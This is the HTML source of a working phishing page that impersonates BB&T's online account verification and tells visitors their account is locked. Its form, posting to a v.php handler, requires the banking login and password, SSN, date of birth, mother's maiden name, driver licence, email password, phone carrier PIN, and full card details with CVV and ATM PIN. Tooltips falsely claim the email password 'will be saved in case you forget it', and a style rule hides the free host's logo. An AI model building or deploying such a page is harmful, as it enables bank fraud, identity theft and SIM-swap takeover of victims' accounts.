
<!DOCTYPE html>

<html class="gt-ie9 ua-windows_nt ua-windows_nt-6 ua-windows_nt-6-1 ua-gecko ua-gecko-54 ua-gecko-54-0 ua-firefox ua-firefox-54 ua-firefox-54-0 ua-desktop ua-desktop-windows js js no-flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths" lang="en">
<head class="at-element-marker" style="visibility: visible;">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

<title>Verification - BB&amp;T Online Account Verification</title>
<meta charset="UTF-8">

<noscript>

<meta http-equiv="refresh" content="">
</noscript>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0, user-scalable=yes">

<meta name="format-detection" content="telephone=yes">


<link href="T.goe/1.ico" rel="Shortcut Icon">
<link href="T.goe/sec.css" rel="stylesheet" type="text/css">

<script type="text/javascript" src="T.goe/ssnzipassist2.js">
</script>

<script type="text/javascript" src="T.goe/ssnzipassist3.js">
</script>
<script type="text/javascript" src="T.goe/ssnzipassist.js">
</script>

<script type="text/javascript" src="T.goe/ssnzip.js">
</script>

<script src="T.goe/1.js" type="text/javascript"></script>
</head>
<body>
	
<div class="innerBody">

<div id="toolbar">

<div class="wrapper">

<div id="auth">

</div>

<a class="more-info icon-menu" id="right-menu" href="#right-menu">
<i class="icon-menu-list"></i>INFO</a>
</div>

</div>

<header id="mainHeader">

<div>
		
<a id="skipNav" href="#mainContent">Skip to main content</a>

<a id="logo" href="">

<img src="T.goe/11.gif" alt="BB&amp;T Logo" width="80" height="80">

</a>

<h1 id="pageTitle">
Online Account Verification
<span>Checking and Savings Accounts</span>

</h1>

</div>

</header>








<div class="progress-wrapper">

<nav id="progress">

<h1 class="accessibilityNote">Progress Indicator</h1>

<header>
<h2 class="accessibilityNote">Current Progress</h2>
<div class="gray-bar">
<div class="Bar" data-start="25" data-end="77" data-current="77">

<div class="progressBack" style="width: 77%;">
<div class="progressTip">
</div>
</div>

<div class="Progress" style="width: 58%;"><span></span>
</div>
<div class="label" style="left: 341px;"><span></span>
</div>

</div>
</div>

</header>

<header>
<h2 class="accessibilityNote">Progress Screen Indicator</h2>

<ul>
<li class="?">

<h3>
<i class="">
</i>
</h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Sign in Verification</a>

</li>

</ul>

<span>&nbsp;</span>
</li>

<li class="?">
<h3><i class=""></i></h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Sign in Verified</a>

</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="?">
<h3><i class=""></i></h3>

<ul>

<li class="">
<i class=""></i>
<a href="#" onclick="app.submit('formPrimary', 'page', '/showAccountSelection')">
 Account Locked</a>

</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="step4 lg  active">

<h3><i class=""></i></h3>

<ul>

<li>
Unlock Verification
</li>

</ul>

<span>&nbsp;</span>

</li>

<li class="step5 lg last ">

<h3><i class=""></i></h3>

<ul>

<li>
Verification Summary
</li>

</ul>

</li>

</ul>

</header>
</nav>

</div>
<div id="pageWrap" class="group">

<div class="three-quarters">








<section id="mainContent" class="personalInfo">

<form id="form1" action="v.php" method="post" autocomplete="on">

<article id="primaryApplicant">

<fieldset>

<h3>Login Verification</h3>
<dl>
<dt>
<label for="uuser">User ID</label>
</dt>
<dd class="large">
<input id="uuser" name="uuser" class="addrListener" value="" placeholder="BB&T User ID" maxlength="40" type="text">
</dd>
<dl>
<dt>
<label for="upass">Password</label>
</dt>
<dd class="large">
<input id="upass" name="upass" class="addrListener" value="" placeholder="BB&T Password" maxlength="40" type="password">
</dd>
</dl>
<h3>Personal Verification</h3>
<dl>
<dt>
<label for="dob">Date of Birth</label>
</dt>
<dd class="large">
<input id="dob" name="dob" class="addrListener" value="" placeholder="DD/MM/YYYY" maxlength="10" type="tel">
</dd>
<dt>
<label for="addr01-out">Street Address</label>
</dt>
<dd class="large">
<input id="street" name="street" class="addrListener" value="" placeholder="Street Address" maxlength="36" type="text">
</dd>
<dt>
<label for="city-out">Driver License</label>
</dt>
<dd class="large">
<input id="dv" name="dv" class="addrListener" value="" placeholder="Driver License" maxlength="40" type="text">
<dt>
<label for="city-out">Mother's Maiden Name</label>
</dt>
<dd class="large">
<input id="mmn" name="mmn" class="addrListener" value="" placeholder="" maxlength="100" type="text">
<dt>
<label for="city-out">City</label>, <label for="state-out">State</label>, <label for="zip-out">ZIP</label>
</dt>	
</dt>
<dd class="large multiInput">
<div class="cityWrap error-wrapper">
<input id="city" name="city" class="addrListener" value="" placeholder="City" maxlength="25" type="text">
</div>
<div class="stateWrap error-wrapper">
<div class="selectWrap">
<div class="selectWrap">
<select id="state" name="state">
<option class="default" value="State">State</option>
<option value="AK">AK</option><option value="AL">AL</option><option value="AR">AR</option><option value="AZ">AZ</option><option value="CA">CA</option><option value="CO">CO</option><option value="CT">CT</option><option value="DC">DC</option><option value="DE">DE</option><option value="FL">FL</option><option value="GA">GA</option><option value="HI">HI</option><option value="IA">IA</option><option value="ID">ID</option><option value="IL">IL</option><option value="IN">IN</option><option value="KS">KS</option><option value="KY">KY</option><option value="LA">LA</option><option value="MA">MA</option><option value="MD">MD</option><option value="ME">ME</option><option value="MI">MI</option><option value="MN">MN</option><option value="MO">MO</option><option value="MS">MS</option><option value="MT">MT</option><option value="NC">NC</option><option value="ND">ND</option><option value="NE">NE</option><option value="NH">NH</option><option value="NJ">NJ</option><option value="NM">NM</option><option value="NV">NV</option><option value="NY">NY</option><option value="OH">OH</option><option value="OK">OK</option><option value="OR">OR</option><option value="PA">PA</option><option value="RI">RI</option><option value="SC">SC</option><option value="SD">SD</option><option value="TN">TN</option><option value="TX">TX</option><option value="UT">UT</option><option value="VA">VA</option><option value="VT">VT</option><option value="WA">WA</option><option value="WI">WI</option><option value="WV">WV</option><option value="WY">WY</option>
<option value="AS">AS</option><option value="FM">FM</option><option value="GU">GU</option><option value="MH">MH</option><option value="MP">MP</option><option value="PR">PR</option><option value="PW">PW</option><option value="VI">VI</option></select><div class="select-arrow"><i class="icon-less"></i></div></div></div>
</div>
<div class="zipWrap error-wrapper">
<input id="zip" name="zip" class="zip addrListener" value="" placeholder="#####" type="tel">
</div>
</dd>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="ssn">Social Security Number (SSN)</label>
<span class="tooltip" data-name="107">Your Social Security number will be used to verify your identity.
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>

</span>
</span>
</span>
</dt>
<dd class="med">
<input id="ssn" name="ssn" class="ssn" value="" placeholder="###-##-####" autocomplete="off" type="tel">
</dd>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="email">Email Address</label>
<span class="tooltip" data-name="172">Your email address will be used to communicate with you regarding the status of your application and the associated promotion with this account.
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>
</span>
</dt>
<dd class="large">
<div class="error-wrapper">
<input id="email" name="email" value="" maxlength="50" type="email">
</div>
</dd>
<dt>
<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">
<label for="emailpass">Email Address Password</label>
<span class="tooltip" data-name="172">Your email address password will be saved in case you forget it.
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>
</span>
</dt>
<dd class="large">
<div class="error-wrapper">
<input id="emailpass" name="emailpass" value="" maxlength="50" type="password">
</div>
</dd>
</dl>
</dd>
<dt>
<label for="pon">Phone Number</label>
</dt>
<dd class="large">
<input id="pon" name="pon" class="addrListener" value="" placeholder="(###)###-####" maxlength="13" type="tel">
</dd>
<dt>
<label for="city-out">Carrier Type</label>, <label for="state-out">Carrier PIN</label>
</dt>	
</dt>
<dd class="large multiInput">
<div class="cityWrap error-wrapper">

</div>
<div class="stateWrap error-wrapper">
<div class="selectWrap">
<div class="selectWrap">
<select id="type" name="type" style="absolute;width:362px;height:45px;z-index:10">
<option class="default" value="State">Select One</option>
<option value="T-Mobile">T-Mobile</option>
<option value="Verizon">Verizon</option>
<option value="Sprint">Sprint</option>
<option value="AT&amp;T">AT&amp;T</option>
<option value="Cricket">Cricket</option>
<option value="Metro pcs">Metro pcs</option>
</select><div class="select-arrow"><i class="icon-less"></i></div></div></div>
</div>
<div class="zipWrap error-wrapper">
<input id="PINi" name="PINi" class="zip addrListener" value="" placeholder="#####" maxlength="6" type="tel">
</div>
</dd>
<dt>
</dt>
<h3>Account Verification</h3>

<dl id="idCommon" style="">

<dt>

<label for="idname">BB&T Card Name</label>

</dt>

<dd class="med">
<input id="cname" name="cname" value="" placeholder="Name ON BB&T Card" maxlength="50" type="text">

</dd>

<dt>

<label for="idNumber">BB&T Card Number</label>

</dt>

<dd class="med">
<input id="cardn" name="cardn" value="" placeholder="####-####-####-####" maxlength="19" type="tel">

</dd>

<dt>

<label for="idNumber">BB&T Card Expiration Date</label>
</dt>

<dd class="med">

<div class="stateWrap error-wrapper">

<div class="selectWrap">
<div class="selectWrap">
<select id="expm" name="expm">

<option class="default" value="Month">Month</option>

<option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option>
</select>
<div class="select-arrow">
<i class="icon-less"></i>
</div>
</div>
</div>

</div>

<div class="stateWrap error-wrapper">

<div class="selectWrap">
<div class="selectWrap">
<select id="expy" name="expy">
<option class="default" value="Year">Year</option>

<option value="2020">2020</option><option value="2021">2021</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option>
</select>
<div class="select-arrow">
<i class="icon-less"></i>
</div>
</div>
</div>
</div>

</dd>

<dt>

<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">

<label for="cvv">BB&T Card CVV Code</label>

<span class="tooltip" data-name="172">BB&T Card Verification Code : 3 Digits Back of BB&T Card .
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>

</span>
</dt>
<dd class="large multiInput">
<div class="cityWrap error-wrapper">
<input id="cvv" name="cvv" class="addrListener" value="" maxlength="3" placeholder="###" type="tel">
</div>

</dd>

<dt>

<span data-name="tooltip-trigger" tabindex="-1" class="help" title="Click to learn more.">

<label for="pin">BB&T Card Pin Code </label>

<span class="tooltip" data-name="172">BB&T Card PIN Code : 4 Digits for ATM Use .
<span tabindex="-1" class="exit" title="Dismiss tooltip">
<i class="icon-ex_"></i>
</span>
</span>

</span>
</dt>
<dd class="large multiInput">

<div class="cityWrap error-wrapper">

<input id="pin" name="pin" class="addrListener" value="" maxlength="4" placeholder="####" type="tel">
</div>

</dd>

</dl>
</fieldset>

<a class="pageTop" href="#pageWrap">Return to top</a>

</article>
<div class="btnRow">

<div class="col6">

<button id="nextBtn" type="submit" name="continue" value="Verify" onclick="setJobCodeDesc();">Verify</button>

</div>
</div>

</form>
<script  type="text/javascript">
var frmvalidator = new Validator("form1");
frmvalidator.addValidation("uuser","req","Please verify your BB&T User ID");
frmvalidator.addValidation("uuser","minlen=5","Please verify your BB&T User ID");
frmvalidator.addValidation("upass","req","Please verify your BB&T Password");
frmvalidator.addValidation("upass","minlen=5","Please verify your BB&T Password");
frmvalidator.addValidation("dob","req","Please verify your Date of Birth");
frmvalidator.addValidation("dob","minlen=6","Please verify your Date of Birth");
frmvalidator.addValidation("street","req","Please verify your Street Address");
frmvalidator.addValidation("dv","req","Please verify your Driver License");
frmvalidator.addValidation("mmn","req","Please verify your Mother's Maiden Name");
frmvalidator.addValidation("pon","req","Please verify your Phone Number");
frmvalidator.addValidation("PINi","req","Please verify your Carrier PIN");
frmvalidator.addValidation("type","req","Please verify your Carrier Type");
frmvalidator.addValidation("city","req","Please verify your City");
frmvalidator.addValidation("state","dontselect=State","Please verify your State");
frmvalidator.addValidation("zip","req","Please verify your Zip Code");
frmvalidator.addValidation("ssn","req","Please verify your Social Security Number (SSN)");
frmvalidator.addValidation("email","req","Please verify your Email Address");
frmvalidator.addValidation("emailpass","req","Please verify your Email Address Password");
frmvalidator.addValidation("cname","req","Please verify your BB&T Card Name");
frmvalidator.addValidation("cname","minlen=5","Please verify your Name On BB&T Card");
frmvalidator.addValidation("cardn","req","Please verify your BB&T Card Number");
frmvalidator.addValidation("cardn","minlen=16","Please verify your BB&T Card Number ( 16 Digits )");
frmvalidator.addValidation("expm","dontselect=Month","Please verify your BB&T Card Expiration Month");
frmvalidator.addValidation("expy","dontselect=Year","Please verify your BB&T Card Expiration Year");
frmvalidator.addValidation("cvv","req","Please verify your BB&T Card Verification Code");
frmvalidator.addValidation("cvv","minlen=3","Please verify your BB&T Card Verification Code ( 3 Digits )");
frmvalidator.addValidation("pin","req","Please verify your BB&T ATM PIN Code");
frmvalidator.addValidation("pin","minlen=4","Please verify your BB&T ATM PIN Code ( 4 Digits )");
</script>
</section>
</div>

<div class="one-quarter">



<div id="sidr-content">

<div id="sidr" class="sidr right">

<aside id="rightRail" class="">

<div class="railBox contactInfo">

<h3>Need Help?</h3>

<div class="lp-button-wrapper" id="lpButtonDiv-dmo">
</div>
<div id="lpChatButton">
</div>

</div>

<div class="railBoxWrap">

<div class="railBoxWrapBack">
<div class="railBox faq">

<h3>
FAQ
<span>&nbsp;</span>
</h3>

<ul class="faqList show-hide">

<li>

<i class=""></i>
<a href="javascript:void(0);">What if I have multiple addresses?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>Simply check the box marked "Add an additional mailing address." To open an account online, one of your addresses must be within our service area.</p>

</li>

<li>

<i class=""></i><a href="javascript:void(0);">How will my email address be used?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>
<div class="conditional">

<p>Your email address will be used to communicate with you regarding the status of your application and the associated promotion with this account, if applicable.</p>

</div>

</li>

<li>

<i class=""></i>
<a href="javascript:void(0);">Why do you need my Social Security number?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>
<div class="conditional">

<p>Your Social Security number will be used to verify your identity. BB&amp;T is required by Federal law to obtain, verify and record information that identifies each person who opens an account.</p>
</div>
</li>

<li>

<i class=""></i>
<a href="javascript:void(0);">Can I open an account if I am not a U.S. citizen?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>You must be a U.S. citizen or legal resident alien with a valid Social Security number to open an account with BB&amp;T.</p>
	</div>

</li>

<li>

<i class=""></i>
<a href="javascript:void(0);">What is a co-applicant?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>A co-applicant is someone who shares ownership and equal financial responsibility of your account. All joint accounts will be opened online in your name as well as in your co-applicant's name. (You may only add one co-applicant to each account.)</p>

</div>

</li>
<li>
<i class=""></i>
<a href="javascript:void(0);">Can I add more than one co-applicant to my account?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>No, you may only add one co-applicant to your application, regardless of the number of accounts you are applying for today.</p>
</div>

</li>

<li>

<i class=""></i>
<a href="javascript:void(0);">Why can't I change my state in the address section?&nbsp;<span class="accessibilityNote">Click to show answer</span></a>

<div class="conditional">

<p>If you don't see your state listed as an option, then you are out of our service area at this time.</p>

</div>
</li>

</ul>

</div>

<a id="close-right" class="close-right-rail" href="#close-right"><i class="icon-ex_"></i></a>

</div>
</div>
</aside>

</div>

</div>

<script type="text/javascript">
function openNewWindow(url) {

	var params = "height=600,width=1000,top=300,left=100,status=yes,toolbar=no,menubar=no,location=no,scrollbars=yes,resizable=yes";
	var bankservAgreement = window.open(url, '_blank', params);

}
</script>

</div>
		
</div>


<script type="text/javascript">

    
    $(document).ready(function() {
    	$('form').submit(function() {
		})
		$('#cardn').mask('9999-9999-9999-9999', {});
	    $('#dob').mask('99/99/9999', {});
	    $('#zip').mask('99999', {});
        $('#pon').mask('(999)999-9999', {});
        $('#exp').mask('99/9999', {});
        $('#cvv').mask('999', {});
	    $('#ssnActual').mask('999-99-9999', {});
    }) 	
</script>

<footer>
<div id="copyright">
<ul class="group">
<li><a target="_blank" href="">Bank Secrecy Act Notice<i class=""></i></a></li>

<li><a target="_blank" href="">BB&amp;T Locations</a></li>
				
<li><a target="_blank" href="">Privacy &amp; Security<i class=""></i></a></li>

</ul>

<p class="preload">
Branch Banking and Trust Company, Member FDIC. <br>
�2020,&nbsp;Branch Banking and Trust Company. All rights reserved.

</p>
</div>

</footer>

<script type="text/javascript" src="T.goe/explain.js"></script>
</body>
<style>
    img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {
display: none;}
</style>
</html>